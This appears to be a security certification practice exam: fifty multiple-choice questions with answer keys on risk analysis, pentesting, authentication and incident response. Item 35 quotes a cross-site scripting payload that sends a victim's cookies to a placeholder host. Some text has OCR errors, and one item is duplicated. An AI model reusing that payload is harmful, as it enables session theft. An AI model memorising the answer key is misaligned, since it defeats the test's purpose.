1.
Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology.Which of the following would be the advantage of conducting this kind of penetration test?
Correct Answer
D. The results should reflect what attackers may be able to learn about the company.
2.
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution hasbeen in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages,with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?
Correct Answer
C. Waterfall model
3.
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management softwareapplication. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Correct Answer
C. Schedule a meeting with key human resource application stakeholders.
4.
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromisecorporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of thefollowing equipment MUST be deployed to guard against unknown threats?
Correct Answer
D. Behavior based IPS with a communication lank to a cloud based vulnerabthty and threat feed
5.
ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counterbasedcodes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe?
Correct Answer
D. HOTP
6.
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourcedsystems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of the following is critical toensure the successful management of system security concerns between the two organizat ions?
Correct Answer
A. ISA
7.
It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited, resulting in cross-site scripting attacksagainst customers reading the blog. Which of the following would be the MOST effective at. preventing the "post your comment" field from being exploited?
Correct Answer
B. Filter metacharacters
8.
A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterpriseantivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the companyimplements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reducemalware infection?
Correct Answer
D. Block cloud-based storage software on the company network
9.
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so theadministrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
Correct Answer
A. The data may not be in a usable format.
10.
The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found .a collection of Linux servers thatare missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What wouldbe a key FIRST step for the data security team to undertake at this point?
Correct Answer
E. Conduct a bit level image, including RAM, of one or more of the Linux servers.
11.
A security manager has received the following email from the Chief Financial Officer (CFO):'While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having adifficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allowso we can get back on track. What should we do first to securely enable this capability for my group?" Based on the information provided, which of the following would bethe MOST appropriate response to the CFO?
Correct Answer
D. Work with the executive management team to revise policies before allowing any remote access.
12.
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ's headquarters. Which of the following BESTprevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
Correct Answer
B. Require Company XYZ employees to establish an encrypted VDI session to the required systems
13.
A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This divisionwill require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industryto execute the task?
Correct Answer
D. Attend conferences, webinars, and training to remain current with the industry and job requirements
14.
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs aneffective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests thatthe company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make?
Correct Answer
B. Social media is an ineffective solution because the policy may not align with the business.
15.
A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which of the followingtechnologies should the administrator implement to meet these goals? (Select TWO).
Correct Answer(s)
D. Dynamic disk pools
E. Multipath
16.
A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. The CIO has hired consultants to develop use cases totest against various government and industry security standards. The CIO is convinced that there is large overlap between the configuration checks and security controlsgoverning each set of standards. Which of the following selections represent the BEST option for the CIO?
Correct Answer
C. Issue a policy specifying best practice security standards and a baseline to be implemented across the company.
17.
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the followingcontrols has likely been implemented by the developers?
Correct Answer
B. SSL certificate pinning
18.
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during theyear. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and. based on industry data, the exposure factor to fires is only20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?
Correct Answer
A. $6,000
19.
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management softwareapplication. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Correct Answer
C. Schedule a meeting with key human resource application stakeholders.
20.
A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the system's SLE?
Correct Answer
B. $8,000
21.
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Thehelpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is locatedwithin the company headquarters and 90% of the callers are telecommuters, which of the· following tools should the helpdesk manager use to make the staff more effectiveat troubleshooting while at the same time reducing company costs? (Select TWO).
Correct Answer(s)
C. Instant messaging
E. Desktop sharing
22.
An organization has implemented an Agile development process for front end web application development . A new security architect has just joined the company andwants to integrate security activities into the SDLC.Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).
Correct Answer(s)
A. Static and dynamic analysis is run as part of integration
D. For each major iteration penetration testing is performed
23.
An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices andconfiguration parameters that technicians could follow during the deployment process?
Correct Answer
D. Guideline
24.
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, systemlog gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to theRFQ. Which of the following questions is the MOST important?
Correct Answer
B. What accountability is built into the remote support application?
25.
An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage .Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web filtering solution willcost the· organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution?
Correct Answer
B. $7,500
26.
A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performanceand functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management.The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for thisscenario?
Correct Answer
B. Deploy a corporate Read-Only Domain Controller to the branch location.
27.
The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normallyavailable to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing thebandwidth at the border router, and notices that the incoming bandwidth on the route(s external interface is maxed out. The security engineer then inspects the followingpiece of log to try and determine the reason for the downtime, focusing on the company's external routers IP which is 128.20.176.19:11:16:22.110343 IP 90237.31.27.19 > 128.20.176.19.19: UDP, length 140011:16:22.110351IP23.27. 112.200.19 > 128.20.176.19.19: UDP, length 140011:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 140011:16:22. 110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 140011:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?
Correct Answer
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block the malicious packets
packets.
28.
A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presencetechnology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concernedabout the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of usingpresence technology?
Correct Answer
C. Physical security
29.
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled:Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0All callers are connected to the same switch and are routed by a router with five built~n interfaces. The upstream router interface's MAC is 00-01-42-32·ab-1aA packet capture shows the following:09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab: 1a (00:01:42:32:ab:1a)09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)09:08:10.937590 IP172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 6553409:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 6553409:08:10.937592 IP172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534Which of the following is occurring on the network?
Correct Answer
D. A denial of service attack is targeting at the router.
30.
A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by theprotocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administratorrecommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues?
Correct Answer
A. A separate physical interface placed on a private VLAN should be configured for live host operations.
31.
After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of thefollowing would help meet these goals by having co-workers occasionally audit another worker's position?
Correct Answer
B. Job rotation
32.
Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?
Correct Answer
C. Undertaking network-based denial of service attacks in production environment
33.
ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (SelectTHREE).
Correct Answer(s)
B. Establish a list of devices that must meet each regulation
D. Compartmentalize the network
F. Apply technical controls to meet compliance with the regulation
34.
A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physical security,which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systemsfrom within? (Select TWO).
Correct Answer(s)
D. HIDS
F. Protocol analyzer
35.
A security administrator notices the following line in a server's security log:<input name='credentials' type=TEXT value="" +request .getParameter('><script>document.location='http://badsite.com/? q='document.cookie</script>') + '";The administrator is concurred that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the securityadministrator implement to prevent this particular attack?
Correct Answer
A. WAF
36.
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personalitems, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegalactivities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activityoccurring in the future?
Correct Answer
B. Job rotation
37.
An educational institution would like to make computer labs available to remote students. The labs are used for various IT networking, security, and programming courses.The requirements are:1. Each lab must be on a separate network segment.2. Labs must have access to the Internet, but not other lab networks.3. Student devices must have network access, not simple access to hosts on the lab networks.4. Students must have a private certificate installed before gaining access.5. Servers must have a private certificate installed locally to provide assurance to the students.6. All students must use the same VPN connection profile.Which of the following components should be used to achieve the design in conjunction with directory services?
Correct Answer
C. IPSec VPN with mutual authentication for remote connectivity , RADIUS for authentication, ACLs on network equipment
38.
A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period andconsequently have the following requirements:Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levelsRequirement 2 Test the behavior between the application and databaseRequirement 3 Ensure that customer data can not be exfiltratedWhich of the following is the BEST solution to meet the above requirements?
Correct Answer
B. Perform dynamic code analysis, penetration test and run a vulnerability scanner
39.
A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is theNEXT step that the security team should take?
Correct Answer
D. Create a proposal and present it to management for approval.
40.
A security administrator is tasked with implementing two-fact.or authentication for the company VPN. The VPN is currently configured to authenticate VPN users against abackend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor.Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no errormessages are displayed to the user during the VPN connection? (Select TWO).
Correct Answer(s)
E. The VPN concentrator's certificate private key must be installed on the VPN concentrator.
F. The CA's certificate public key must be installed on the VPN concentrator.
41.
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company seivers via REST/JSON calls.The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST beimplemented to enable stateless communication?
Correct Answer
D. Authentication assertion should be stored securely on the client.
42.
A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords inthe shortest time period?
Correct Answer
B. Rainbow tables attack
43.
VPN users cannot access the active FTP server through the router but can access any server in the data center.Additional network information:DMZ network 192.168.5.0/24 (FTP server is 192.168.5. 11) VPN network 192.168.1.0/24Datacenter 192.168.2.0/24User network - 192.168.3.0/24HR network 192.168.4 .0/24\Traffic shaper configuration:VLAN Bandwidth Limit (Mbps)VPN 50User 175HR 250Finance 250Guest 0Router ACL:Action Source DestinationPermit 192.168.1.0/24 192.168.2.0/24Permit 192.168.1.0/24 192.168.3.0/24Permit 192.168.1.0/24 192.168.5.0/24Permit 192.168.2.0/24 192.168.1.0/24Permit 192.168.3.0/24 192.168.1.0/24Permit 192.168.5.1/32 192.168.1.0/24Deny 192.168.4 .0/24 192.168.1.0/24Deny 192.168.1.0/24 192.168.4 .0/24Deny any anyWhich of the following solutions would allow the users to access the active FTP server?
Correct Answer
A. Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network
44.
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:user@hostname:-$ sudo nmap 0 192.168.1.54Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:TCP/22TCP/ 111TCP/512-514TCP/2049TCP/32778Based on this information, which of the following operating systems is MOST likely running on the unknown node?
Correct Answer
C. Solaris
45.
Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary informationand closely guarded corporate trade secrets.The information security team has been a part of the department meetings and come away with the following notes:-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee managementapplication, a cloud- based Saas application.-Sales is asking for easy order tracking to facilitate feedback to customers. -Legal is asking for adequate safeguards to protect trade secrets. They are also concerned withdata ownership questions and legal jurisdiction.-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to bequick and easy. -Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-onlyaccess to the entire workflow process for monitoring and baselining.The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality, but also has readily available APls forextensibility. It supports read-only access, kiosk automation, custom fields, and data encryption.Which of the following departments' request is in contrast to the favored solution?
Correct Answer
E. Human resources
46.
A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products throughthe same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketingmaterial and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified anincreased target across the software products that will be affected by the financial department's change. All software products will continue to go through new developmentin the coming year. Which oft.he following should the sales manager do to ensure the company stays out of trouble?
Correct Answer
B. Consult the company's legal department on practices and law
47.
A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internallydeveloped . The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability, stability , and performance.Which of the following would provide the MOST thorough testing and satisfy the CE O's requirements?
Correct Answer
C. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings.
48.
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect forcompany XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies.The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning Pll, and administrative complexity on the proposal. Whichof the following BEST describes the core concerns of the security architect?
Correct Answer
C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
49.
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures theorganization mitigates the risk of managing separate user credentials?
Correct Answer
E. Ensure the SaaS provider supports directory services federation.
50.
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determinewhich additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the followingBEST describes the scenario presented and the document the ISO is reviewing?
Correct Answer
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.